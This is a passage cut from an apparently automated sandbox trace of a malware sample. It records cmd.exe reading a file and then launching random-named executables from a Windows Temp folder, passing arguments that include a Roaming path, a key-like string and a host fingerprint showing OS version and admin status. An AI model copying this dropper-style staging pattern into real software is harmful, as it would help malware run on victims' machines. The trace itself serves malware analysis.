lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.645] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.645] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.645] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.646] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.646] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.646] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.647] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.647] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.647] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.699] _close (_FileHandle=4) returned 0 [0107.699] FindNextFileW (in: hFindFile=0x1e2030, lpFindFileData=0x1af0a8 | out: lpFindFileData=0x1af0a8) returned 0 [0107.700] GetLastError () returned 0x12 [0107.700] FindClose (in: hFindFile=0x1e2030 | out: hFindFile=0x1e2030) returned 1 [0107.700] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0107.703] _close (_FileHandle=3) returned 0 [0107.704] GetConsoleTitleW (in: lpConsoleTitle=0x1af544, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.704] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe\"")) returned 0xffffffff [0107.704] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0107.704] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0107.704] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0107.704] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0107.704] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0107.704] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0107.704] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0107.704] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0107.704] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0107.705] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0107.705] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0107.705] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0107.705] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0107.705] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0107.705] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0107.705] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0107.705] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0107.705] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0107.705] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0107.705] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0107.705] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0107.705] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0107.705] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0107.705] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0107.705] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0107.705] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0107.705] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0107.705] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0107.705] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0107.705] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0107.705] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0107.705] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0107.705] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0107.705] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0107.705] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0107.706] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0107.706] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0107.706] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0107.706] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0107.706] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0107.706] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0107.706] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0107.706] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0107.706] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0107.706] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0107.706] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0107.706] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0107.706] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0107.706] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0107.706] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0107.706] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0107.706] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0107.706] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0107.706] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0107.706] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0107.706] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0107.706] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0107.706] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0107.706] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0107.706] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0107.706] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0107.706] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0107.706] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0107.706] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0107.706] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0107.706] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0107.706] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0107.706] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0107.706] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0107.707] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0107.707] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0107.707] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0107.707] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0107.707] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0107.707] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0107.707] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0107.707] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0107.707] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0107.707] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0107.707] SetErrorMode (uMode=0x0) returned 0x0 [0107.707] SetErrorMode (uMode=0x1) returned 0x0 [0107.707] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x1e0508, lpFilePart=0x1af064 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x1af064*="Temp") returned 0x23 [0107.707] SetErrorMode (uMode=0x0) returned 0x1 [0107.707] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0107.707] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.710] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", fInfoLevelId=0x1, lpFindFileData=0x1aee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aee00) returned 0x1e2030 [0107.711] FindClose (in: hFindFile=0x1e2030 | out: hFindFile=0x1e2030) returned 1 [0107.711] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0107.711] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0107.711] GetConsoleTitleW (in: lpConsoleTitle=0x1af2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.711] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af160, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af228 | out: lpAttributeList=0x1af160, lpSize=0x1af228) returned 1 [0107.711] UpdateProcThreadAttribute (in: lpAttributeList=0x1af160, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af220, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af160, lpPreviousValue=0x0) returned 1 [0107.711] GetStartupInfoW (in: lpStartupInfo=0x1af11c | out: lpStartupInfo=0x1af11c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0107.711] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0107.712] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0107.712] lstrcmpW (lpString1="\\F8a3iwA6.exe", lpString2="\\XCOPY.EXE") returned -1 [0107.713] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af208 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", lpProcessInformation=0x1af208*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcac, dwThreadId=0xcb0)) returned 1 [0107.972] CloseHandle (hObject=0x4c) returned 1 [0107.972] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0107.972] GetEnvironmentStringsW () returned 0x1e2d20* [0107.973] FreeEnvironmentStringsW (penv=0x1e2d20) returned 1 [0107.973] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0108.776] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af0fc | out: lpExitCode=0x1af0fc*=0x0) returned 1 [0108.776] CloseHandle (hObject=0x50) returned 1 [0108.776] _vsnwprintf (in: _Buffer=0x1af244, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af108 | out: _Buffer="00000000") returned 8 [0108.776] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0108.776] GetEnvironmentStringsW () returned 0x1e24e8* [0108.777] FreeEnvironmentStringsW (penv=0x1e24e8) returned 1 [0108.777] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0108.777] GetEnvironmentStringsW () returned 0x1e24e8* [0108.777] FreeEnvironmentStringsW (penv=0x1e24e8) returned 1 [0108.777] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af160 | out: lpAttributeList=0x1af160) [0108.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.777] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0108.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.777] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa441ac | out: lpMode=0x4aa441ac) returned 1 [0108.777] _get_osfhandle (_FileHandle=0) returned 0x3 [0108.777] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa441b0 | out: lpMode=0x4aa441b0) returned 1 [0108.777] SetConsoleInputExeNameW () returned 0x1 [0108.777] GetConsoleOutputCP () returned 0x1b5 [0108.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0108.778] SetThreadUILanguage (LangId=0x0) returned 0x409 [0108.778] exit (_Code=0) Process: id = "31" image_name = "wtsk8wxh.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe" page_root = "0x7ea16900" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0xc70" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 